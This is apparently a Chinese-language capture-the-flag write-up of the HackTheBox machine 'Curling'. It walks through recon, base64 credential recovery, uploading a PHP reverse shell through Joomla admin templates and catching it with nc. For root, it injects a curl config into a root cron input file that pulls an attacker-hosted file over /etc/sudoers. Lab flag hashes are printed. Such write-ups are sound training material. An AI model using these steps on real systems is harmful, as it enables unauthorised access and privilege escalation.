Hackthebox - Curling
靶场信息
靶场类型
信息收集
Nmap
┌──(root💀kali)-[~/Desktop]
└─# nmap -sS -A -sC -sV -p- --min-rate 5000 10.10.10.150
Starting Nmap 7.91 ( https://nmap.org ) at 2022-04-26 21:40 EDT
Nmap scan report for 10.10.10.150
Host is up (0.34s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|_ 256 c1:2a:35:44:30:0c:5b:56:6a:3f:a5:cc:64:66:d9:a9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-generator: Joomla! - Open Source Content Management
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Home
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=4/26%OT=22%CT=1%CU=41478%PV=Y%DS=2%DC=T%G=Y%TM=62689FB
OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=2%ISR=10B%TI=Z%CI=Z%II=I%TS=C)OPS
OS:(O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST1
OS:1NW7%O6=M505ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 338.76 ms 10.10.14.1
2 339.30 ms 10.10.10.150
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 175.76 seconds
HTTP
这一台似乎是关于冰壶的,到处看了一下,没看到什么突破口,弱口令也没有登入进去,去 Fuzz 一下
Fuzz
┌──(root💀kali)-[~/Desktop]
└─# gobuster dir -u http://10.10.10.150/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 200 --no-error 1 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.150/
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/04/27 01:33:22 Starting gobuster in directory enumeration mode
===============================================================
/media (Status: 301) [Size: 312] [--> http://10.10.10.150/media/]
/templates (Status: 301) [Size: 316] [--> http://10.10.10.150/templates/]
/images (Status: 301) [Size: 313] [--> http://10.10.10.150/images/]
/modules (Status: 301) [Size: 314] [--> http://10.10.10.150/modules/]
/bin (Status: 301) [Size: 310] [--> http://10.10.10.150/bin/]
/plugins (Status: 301) [Size: 314] [--> http://10.10.10.150/plugins/]
/includes (Status: 301) [Size: 315] [--> http://10.10.10.150/includes/]
/language (Status: 301) [Size: 315] [--> http://10.10.10.150/language/]
/components (Status: 301) [Size: 317] [--> http://10.10.10.150/components/]
/libraries (Status: 301) [Size: 316] [--> http://10.10.10.150/libraries/]
/cache (Status: 301) [Size: 312] [--> http://10.10.10.150/cache/]
/tmp (Status: 301) [Size: 310] [--> http://10.10.10.150/tmp/]
/layouts (Status: 301) [Size: 314] [--> http://10.10.10.150/layouts/]
/administrator (Status: 301) [Size: 320] [--> http://10.10.10.150/administrator/]
/cli (Status: 301) [Size: 310] [--> http://10.10.10.150/cli/]
/server-status (Status: 403) [Size: 277]
===============================================================
2022/04/27 01:59:29 Finished
===============================================================
挨个去看一下
在 /administrator 目录下,找到了一个 Joomla,但是不知道版本,搜索了一下 Joomla 也没有默认密码,继续看看
</body>
<!-- secret.txt -->
</html>
在首页的源代码最下面的 359 行发现了一个文件,去查看一下
Q3VybGluZzIwMTgh
┌──(root💀kali)-[~/Desktop]
└─# echo Q3VybGluZzIwMTgh|base64 -d
Curling2018!
我猜想这应该是一个密码
然后在首页面获取到一个账号
username = Floris
password = Curling2018!
登录成功,但这里似乎没什么东西,我们尝试去 Joomla 登录试试
登录成功,东西比较多,到处找找有没有突破口
漏洞利用
选择首页面的 Global → Media → Legal Extensions (File Types)
然后添加上我们要的后缀 php
修改好以后点击 Save&close
接着使用 nc 监听一个端口
nc -nvlp 4444
然后访问 Extensions → Templates → Templates → Beez3 Details and Files
接着添加一个新文件
https://github.com/LucifielHack/php-reverse-shell/blob/master/php-reverse-shell.php
把我们的 reverse-shell.php 给传上去
┌──(root💀kali)-[~/Desktop]
└─# curl http://10.10.10.150/templates/beez3/shell.php
接着请求一下我们的 shell
┌──(root💀kali)-[~/Desktop]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.16.12] from (UNKNOWN) [10.10.10.150] 40030
Linux curling 4.15.0-156-generic #163-Ubuntu SMP Thu Aug 19 23:31:58 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
06:24:26 up 31 min, 0 users, load average: 0.06, 0.01, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (1262): Inappropriate ioctl for device
bash: no job control in this shell
www-data@curling:/$ whoami&&id
whoami&&id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
成功拿到一个 shell
接着修复一下shell
python3 -c "import pty;pty.spawn('/bin/bash')"
Ctrl+Z
stty raw -echo; fg
export TERM=xterm
stty rows 51 cols 237
权限提升
User
www-data@curling:/home$ ls
floris
www-data@curling:/home$ cd floris
www-data@curling:/home/floris$ ls
admin-area password_backup user.txt
在 /home/floris 中发现了一个目录 admin-area 一个文件 password_backup
其中目录我们没权限访问,但文件我们有权限访问
www-data@curling:/home/floris$ cat password_backup
00000000: 425a 6839 3141 5926 5359 819b bb48 0000 BZh91AY&SY...H..
00000010: 17ff fffc 41cf 05f9 5029 6176 61cc 3a34 ....A...P)ava.:4
00000020: 4edc cccc 6e11 5400 23ab 4025 f802 1960 N...n.T.#.@%...`
00000030: 2018 0ca0 0092 1c7a 8340 0000 0000 0000 ......z.@......
00000040: 0680 6988 3468 6469 89a6 d439 ea68 c800 ..i.4hdi...9.h..
00000050: 000f 51a0 0064 681a 069e a190 0000 0034 ..Q..dh........4
00000060: 6900 0781 3501 6e18 c2d7 8c98 874a 13a0 i...5.n......J..
00000070: 0868 ae19 c02a b0c1 7d79 2ec2 3c7e 9d78 .h...*..}y..<~.x
00000080: f53e 0809 f073 5654 c27a 4886 dfa2 e931 .>...sVT.zH....1
00000090: c856 921b 1221 3385 6046 a2dd c173 0d22 .V...!3.`F...s."
000000a0: b996 6ed4 0cdb 8737 6a3a 58ea 6411 5290 ..n....7j:X.d.R.
000000b0: ad6b b12f 0813 8120 8205 a5f5 2970 c503 .k./... ....)p..
000000c0: 37db ab3b e000 ef85 f439 a414 8850 1843 7..;.....9...P.C
000000d0: 8259 be50 0986 1e48 42d5 13ea 1c2a 098c .Y.P...HB....*..
000000e0: 8a47 ab1d 20a7 5540 72ff 1772 4538 5090 .G.. .U@r..rE8P.
000000f0: 819b bb48 ...H
查看后发现是乱码,使用 xxd 查看并保存到文件
www-data@curling:/home/floris$ xxd -r password_backup > /tmp/backup
www-data@curling:/home/floris$ cd /tmp
www-data@curling:/tmp$ file backup
backup: bzip2 compressed data, block size = 900k
查看文件类型发现是一个 bzip2 的类型
www-data@curling:/tmp$ mv backup backup.bz2
www-data@curling:/tmp$ bzip2 -d backup.bz2
www-data@curling:/tmp$ ls
backup
咱们把这个文件解压出来,然后再去看看
www-data@curling:/tmp$ ls
backup
www-data@curling:/tmp$ file backup
backup: gzip compressed data, was "password", last modified: Tue May 22 19:16:20 2018, from Unix
解压出来后发现是个 gzip 文件,还得解压一次
www-data@curling:/tmp$ mv backup backup.gz
www-data@curling:/tmp$ tar xvf backup.gz
www-data@curling:/tmp$ ls
backup.out
www-data@curling:/tmp$ file backup.out
backup.out: POSIX tar archive (GNU)
反正这里得解压好几次,给我弄的有点晕,还以为是在无限循环呢
www-data@curling:/tmp$ mv backup.out backup.tar
www-data@curling:/tmp$ tar xvf backup.tar
password.txt
总算解压完了,查看一下文件
www-data@curling:/tmp$ cat password.txt
5d<wdCbdZu)|hChXll
感觉这是用户 floris 的密码了,去登录 ssh 试试
┌──(root💀kali)-[~/Desktop]
└─# ssh floris@10.10.10.150
The authenticity of host '10.10.10.150 (10.10.10.150)' can't be established.
ECDSA key fingerprint is SHA256:o1Cqn+GlxiPRiKhany4ZMStLp3t9ePE9GjscsUsEjWM.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.150' (ECDSA) to the list of known hosts.
floris@10.10.10.150's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-156-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Apr 28 06:53:07 UTC 2022
System load: 0.0 Processes: 172
Usage of /: 49.2% of 9.78GB Users logged in: 0
Memory usage: 25% IP address for ens33: 10.10.10.150
Swap usage: 0%
0 updates can be applied immediately.
Last login: Wed Sep 8 11:42:07 2021 from 10.10.14.15
floris@curling:~$ whoami&&id
floris
uid=1000(floris) gid=1004(floris) groups=1004(floris)
成功提权到 user 权限用户
floris@curling:~$ cat user.txt
65dd1df0713b40d88ead98cf11b8530b
成功拿到一个 user 权限的 flag 文件
Root
floris@curling:~$ sudo -l
[sudo] password for floris:
Sorry, user floris may not run sudo on curling.
sudo -l 没有东西,咱们还是着眼于 admin-area 目录吧
floris@curling:~/admin-area$ ls -la
total 28
drwxr-x--- 2 root floris 4096 May 22 2018 .
drwxr-xr-x 6 floris floris 4096 May 22 2018 ..
-rw-rw---- 1 root floris 25 Apr 28 06:55 input
-rw-rw---- 1 root floris 14236 Apr 28 06:55 report
这边是有两个文件,并且咱们有查看和写入权限
floris@curling:~/admin-area$ cat input
url = "http://127.0.0.1"
floris@curling:~/admin-area$ cat report
<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta charset="utf-8" />
<base href="http://127.0.0.1/" />
<meta name="description" content="best curling site on the planet!" />
<meta name="generator" content="Joomla! - Open Source Content Management" />
<title>Home</title>
<link href="/index.php?format=feed&type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
<link href="/index.php?format=feed&type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" />
<link href="/templates/protostar/favicon.ico" rel="shortcut icon" type="image/vnd.microsoft.icon" />
<link href="/templates/protostar/css/template.css?b6bf078482bc6a711b54fa9e74e19603" rel="stylesheet" />
<link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet" />
<style>
h1, h2, h3, h4, h5, h6, .site-title {
font-family: 'Open Sans', sans-serif;
}
</style>
<script type="application/json" class="joomla-script-options new">{"csrf.token":"e6b8a82d84a03e7e05d6452f52f975f7","system.paths":{"root":"","base":""},"system.keepalive":{"interval":840000,"uri":"\/index.php\/component\/ajax\/?format=json"}}</script>
<script src="/media/jui/js/jquery.min.js?b6bf078482bc6a711b54fa9e74e19603"></script>
<script src="/media/jui/js/jquery-noconflict.js?b6bf078482bc6a711b54fa9e74e19603"></script>
<script src="/media/jui/js/jquery-migrate.min.js?b6bf078482bc6a711b54fa9e74e19603"></script>
<script src="/media/system/js/caption.js?b6bf078482bc6a711b54fa9e74e19603"></script>
<script src="/media/jui/js/bootstrap.min.js?b6bf078482bc6a711b54fa9e74e19603"></script>
<script src="/templates/protostar/js/template.js?b6bf078482bc6a711b54fa9e74e19603"></script>
<!--[if lt IE 9]><script src="/media/jui/js/html5.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
<script src="/media/system/js/core.js?b6bf078482bc6a711b54fa9e74e19603"></script>
<!--[if lt IE 9]><script src="/media/system/js/polyfill.event.js?b6bf078482bc6a711b54fa9e74e19603"></script><![endif]-->
<script src="/media/system/js/keepalive.js?b6bf078482bc6a711b54fa9e74e19603"></script>
<script>
jQuery(window).on('load', function() {
new JCaption('img.caption');
jQuery(function($){ initTooltips(); $("body").on("subform-row-add", initTooltips); function initTooltips (event, container) { container = container || document;$(container).find(".hasTooltip").tooltip({"html": true,"container": "body"});} });
</script>
</head>
<body class="site com_content view-featured no-layout no-task itemid-101">
<!-- Body -->
<div class="body" id="top">
<div class="container">
<!-- Header -->
<header class="header" role="banner">
<div class="header-inner clearfix">
<a class="brand pull-left" href="/">
<span class="site-title" title="Cewl Curling site!">Cewl Curling site!</span> </a>
<div class="header-search pull-right">
</div>
</div>
</header>
<div class="row-fluid">
<main id="content" role="main" class="span9">
<!-- Begin Content -->
<div id="system-message-container">
</div>
<div class="blog-featured" itemscope itemtype="https://schema.org/Blog">
<div class="page-header">
<h1>
Home </h1>
</div>
<div class="items-leading clearfix">
<div class="leading-0 clearfix"
itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
<h2 class="item-title" itemprop="headline">
<a href="/index.php/2-uncategorised/3-what-s-the-object-of-curling" itemprop="url">
What's the object of curling? </a>
</h2>
<div class="icons">
<div class="btn-group pull-right">
<button class="btn dropdown-toggle" type="button" id="dropdownMenuButton-3" aria-label="User tools"
data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
<span class="icon-cog" aria-hidden="true"></span>
<span class="caret" aria-hidden="true"></span>
</button>
<ul class="dropdown-menu" aria-labelledby="dropdownMenuButton-3">
<li class="print-icon"> <a href="/index.php/2-uncategorised/3-what-s-the-object-of-curling?tmpl=component&print=1" title="Print article < What's the object of curling? >" onclick="window.open(this.href,'win2','status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no'); return false;" rel="nofollow"> <span class="icon-print" aria-hidden="true"></span>
Print </a> </li>
</ul>
</div>
</div>
<dl class="article-info muted">
<dt class="article-info-term">
Details </dt>
<dd class="createdby" itemprop="author" itemscope itemtype="https://schema.org/Person">
Written by <span itemprop="name">Super User</span> </dd>
<dd class="category-name">
Category: <a href="/index.php/2-uncategorised" itemprop="genre">Uncategorised</a> </dd>
<dd class="published">
<span class="icon-calendar" aria-hidden="true"></span>
<time datetime="2018-05-22T18:54:21+00:00" itemprop="datePublished">
Published: 22 May 2018 </time>
</dd>
<dd class="hits">
<span class="icon-eye-open" aria-hidden="true"></span>
<meta itemprop="interactionCount" content="UserPageVisits:5" />
Hits: 5 </dd> </dl>
<p>Good question. First, let's get a bit of the jargon down. The playing surface in curling is called "the sheet." Sheet dimensions can vary, but they're usually around 150 feet long by about 15 feet wide. The sheet is covered with tiny droplets of water that become ice and cause the stones to "curl," or deviate from a straight path. These water droplets are known as "pebble."</p>
</div>
</div>
<div class="items-row cols-3 row-0 row-fluid">
<div class="item column-1 span4"
itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
<h2 class="item-title" itemprop="headline">
<a href="/index.php/2-uncategorised/2-curling-you-know-its-true" itemprop="url">
Curling you know its true! </a>
</h2>
<div class="icons">
<div class="btn-group pull-right">
<button class="btn dropdown-toggle" type="button" id="dropdownMenuButton-2" aria-label="User tools"
data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
<span class="icon-cog" aria-hidden="true"></span>
<span class="caret" aria-hidden="true"></span>
</button>
<ul class="dropdown-menu" aria-labelledby="dropdownMenuButton-2">
<li class="print-icon"> <a href="/index.php/2-uncategorised/2-curling-you-know-its-true?tmpl=component&print=1" title="Print article < Curling you know its true! >" onclick="window.open(this.href,'win2','status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no'); return false;" rel="nofollow"> <span class="icon-print" aria-hidden="true"></span>
Print </a> </li>
</ul>
</div>
</div>
<dl class="article-info muted">
<dt class="article-info-term">
Details </dt>
<dd class="createdby" itemprop="author" itemscope itemtype="https://schema.org/Person">
Written by <span itemprop="name">Super User</span> </dd>
<dd class="category-name">
Category: <a href="/index.php/2-uncategorised" itemprop="genre">Uncategorised</a> </dd>
<dd class="published">
<span class="icon-calendar" aria-hidden="true"></span>
<time datetime="2018-05-22T18:53:17+00:00" itemprop="datePublished">
Published: 22 May 2018 </time>
</dd>
<dd class="hits">
<span class="icon-eye-open" aria-hidden="true"></span>
<meta itemprop="interactionCount" content="UserPageVisits:4" />
Hits: 4 </dd> </dl>
<p>Curling is absolutely the best sport to watch on television, particularly for viewers looking for an escape from the frantic "more, faster, bigger, higher" grind of most televised games. Watching basketball or hockey can get you so hyped up, you feel like drinking a Red Bull and doing jumping jacks. Watching curling makes you want to drink a glass of red wine and lie down on the shag carpet. Curling is deliberate. Thoughtful, even. The games move very slowly. The players spend a lot of time talking strategy. There are nods and quiet words of encouragement; rarely are there disagreements. When it comes time for a team member to play their turn by sliding a stone down the ice, the moves are elegant. There's a wind up, a push-off, a slide, and a gentle release. Such poise and finesse!</p>
</div>
<div class="item column-2 span4"
itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
<h2 class="item-title" itemprop="headline">
<a href="/index.php/2-uncategorised/1-first-post-of-curling2018" itemprop="url">
My first post of curling in 2018! </a>
</h2>
<div class="icons">
<div class="btn-group pull-right">
<button class="btn dropdown-toggle" type="button" id="dropdownMenuButton-1" aria-label="User tools"
data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
<span class="icon-cog" aria-hidden="true"></span>
<span class="caret" aria-hidden="true"></span>
</button>
<ul class="dropdown-menu" aria-labelledby="dropdownMenuButton-1">
<li class="print-icon"> <a href="/index.php/2-uncategorised/1-first-post-of-curling2018?tmpl=component&print=1" title="Print article < My first post of curling in 2018! >" onclick="window.open(this.href,'win2','status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no'); return false;" rel="nofollow"> <span class="icon-print" aria-hidden="true"></span>
Print </a> </li>
</ul>
</div>
</div>
<dl class="article-info muted">
<dt class="article-info-term">
Details </dt>
<dd class="createdby" itemprop="author" itemscope itemtype="https://schema.org/Person">
Written by <span itemprop="name">Super User</span> </dd>
<dd class="category-name">
Category: <a href="/index.php/2-uncategorised" itemprop="genre">Uncategorised</a> </dd>
<dd class="published">
<span class="icon-calendar" aria-hidden="true"></span>
<time datetime="2018-05-22T18:51:53+00:00" itemprop="datePublished">
Published: 22 May 2018 </time>
</dd>
<dd class="hits">
<span class="icon-eye-open" aria-hidden="true"></span>
<meta itemprop="interactionCount" content="UserPageVisits:4" />
Hits: 4 </dd> </dl>
<p>Hey this is the first post on this amazing website! Stay tuned for more amazing content! curling2018 for the win!</p>
<p>- Floris</p>
</div>
</div>
</div>
<div class="clearfix"></div>
<ul itemscope itemtype="https://schema.org/BreadcrumbList" class="breadcrumb">
<li>
You are here:
</li>
<li itemprop="itemListElement" itemscope itemtype="https://schema.org/ListItem" class="active">
<span itemprop="name">
Home </span>
<meta itemprop="position" content="1">
</li>
</ul>
<!-- End Content -->
</main>
<div id="aside" class="span3">
<!-- Begin Right Sidebar -->
<div class="well _menu"><h3 class="page-header">Main Menu</h3><ul class="nav menu">
<li class="item-101 default current active"><a href="/index.php" >Home</a></li></ul>
</div><div class="well "><h3 class="page-header">Login Form</h3><form action="/index.php" method="post" id="login-form" class="form-inline">
<div class="userdata">
<div id="form-login-username" class="control-group">
<div class="controls">
<div class="input-prepend">
<span class="add-on">
<span class="icon-user hasTooltip" title="Username"></span>
<label for="modlgn-username" class="element-invisible">Username</label>
</span>
<input id="modlgn-username" type="text" name="username" class="input-small" tabindex="0" size="18" placeholder="Username" />
</div>
</div>
</div>
<div id="form-login-password" class="control-group">
<div class="controls">
<div class="input-prepend">
<span class="add-on">
<span class="icon-lock hasTooltip" title="Password">
</span>
<label for="modlgn-passwd" class="element-invisible">Password </label>
</span>
<input id="modlgn-passwd" type="password" name="password" class="input-small" tabindex="0" size="18" placeholder="Password" />
</div>
</div>
</div>
<div id="form-login-remember" class="control-group checkbox">
<label for="modlgn-remember" class="control-label">Remember Me</label> <input id="modlgn-remember" type="checkbox" name="remember" class="inputbox" value="yes"/>
</div>
<div id="form-login-submit" class="control-group">
<div class="controls">
<button type="submit" tabindex="0" name="Submit" class="btn btn-primary login-button">Log in</button>
</div>
</div>
<ul class="unstyled">
<li>
<a href="/index.php/component/users/?view=remind&Itemid=101">
Forgot your username?</a>
</li>
<li>
<a href="/index.php/component/users/?view=reset&Itemid=101">
Forgot your password?</a>
</li>
</ul>
<input type="hidden" name="option" value="com_users" />
<input type="hidden" name="task" value="user.login" />
<input type="hidden" name="return" value="aHR0cDovLzEyNy4wLjAuMS8=" />
<input type="hidden" name="e6b8a82d84a03e7e05d6452f52f975f7" value="1" /> </div>
</form>
</div>
<!-- End Right Sidebar -->
</div>
</div>
</div>
</div>
<!-- Footer -->
<footer class="footer" role="contentinfo">
<div class="container">
<hr />
<p class="pull-right">
<a href="#top" id="back-top">
Back to Top </a>
</p>
<p>
© 2022 Cewl Curling site! </p>
</div>
</footer>
</body>
<!-- secret.txt -->
</html>
有点没明白这是什么意思,但是 input 提示本地 URL 地址,我们还是去请求一下试试吧
curl http://127.0.0.1
然后返回的是 report 的内容,也是首页的内容
floris@curling:~/admin-area$ ls -la
total 28
drwxr-x--- 2 root floris 4096 May 22 2018 .
drwxr-xr-x 6 floris floris 4096 May 22 2018 ..
-rw-rw---- 1 root floris 25 Apr 28 06:55 input
-rw-rw---- 1 root floris 14236 Apr 28 06:55 report
floris@curling:~/admin-area$ ls -la
total 28
drwxr-x--- 2 root floris 4096 May 22 2018 .
drwxr-xr-x 6 floris floris 4096 May 22 2018 ..
-rw-rw---- 1 root floris 25 Apr 28 07:02 input
-rw-rw---- 1 root floris 14236 Apr 28 07:02 report
对比一下,发现这两个文件一直在被刷新或者说写入内容
运行一下 pspy64 看看
2022/04/28 07:16:01 CMD: UID=0 PID=16262 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2022/04/28 07:16:01 CMD: UID=0 PID=16261 | /bin/sh -c sleep 1; cat /root/default.txt > /home/floris/admin-area/input
2022/04/28 07:16:01 CMD: UID=0 PID=16260 | /usr/sbin/CRON -f
2022/04/28 07:16:01 CMD: UID=0 PID=16259 | /usr/sbin/CRON -f
2022/04/28 07:16:01 CMD: UID=0 PID=16264 | curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2022/04/28 07:16:13 CMD: UID=0 PID=16266 |
2022/04/28 07:17:01 CMD: UID=0 PID=16274 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
2022/04/28 07:17:01 CMD: UID=0 PID=16272 | /bin/sh -c curl -K /home/floris/admin-area/input -o /home/floris/admin-area/report
我们可以看到,这个 curl 每隔几秒就会运行一下,那咱们是可以在 /home/floris/admin-area/input 中写入恶意内容,以 Getshell
在本地构造一个恶意 exploit 文件
┌──(root💀kali)-[/opt/tools]
└─# cat exploit
root ALL=(ALL:ALL) ALL
floris ALL=(ALL:ALL) ALL
然后使用 python3 开启一个 HTTP 服务器
python3 -m http.server 80
接着在靶机中执行下面的命令
echo -e 'url = "http://10.10.16.12/exploit"\noutput = "/etc/sudoers"' > input
然后等着就行
┌──(root💀kali)-[/opt/tools]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.150 - - [28/Apr/2022 03:23:03] "GET /exploit HTTP/1.1" 200 -
等我们这边的 HTTP 服务出现请求以后,就是修改成功了
接着使用 sudo su 切换到 root 用户,密码还是 floris 用户的密码
floris@curling:~/admin-area$ sudo su
[sudo] password for floris:
root@curling:/home/floris/admin-area# whoami&&id
root
uid=0(root) gid=0(root) groups=0(root)
成功提权到 root 权限
root@curling:/home/floris/admin-area# cat /root/root.txt
82c198ab6fc5365fdc6da2ee5c26064a
成功拿到 root 权限的 flag 文件
